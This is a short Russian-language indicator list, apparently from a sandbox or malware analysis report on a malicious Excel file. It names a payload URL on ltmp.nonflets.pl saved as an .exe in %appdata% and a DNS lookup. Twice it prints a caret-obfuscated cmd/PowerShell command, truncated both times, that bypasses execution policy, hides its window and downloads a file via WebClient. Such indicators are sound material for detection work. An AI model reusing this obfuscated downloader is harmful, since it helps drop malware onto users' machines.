Техническая информация
- %ProgramFiles(x86)%\microsoft office\office16\excel.exe
- http://ltmp.nonflets.pl/file/hen.trf как %appdata%.exe
- '%WINDIR%\syswow64\cmd.exe' /C "pOwErsH^elL.EX^E -E^Xe^CuT^iO^N^p^ol^i^cy ^By^p^AsS -^N^oP^r^oFIle^ -^W^Indo^WS^T^Y^Le^ H^Idde^n (^ne^w^-^oBje^C^t ^Sys^TE^m.N^E^T.wEbC^li^e^nT^)^.^do^wNl^oaD^F^I^lE^(^'http://ltmp...
- DNS ASK lt##.#onflets.pl
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /C "pOwErsH^elL.EX^E -E^Xe^CuT^iO^N^p^ol^i^cy ^By^p^AsS -^N^oP^r^oFIle^ -^W^Indo^WS^T^Y^Le^ H^Idde^n (^ne^w^-^oBje^C^t ^Sys^TE^m.N^E^T.wEbC^li^e^nT^)^.^do^wNl^oaD^F^I^lE^(^'http://ltmp...' (со скрытым окном)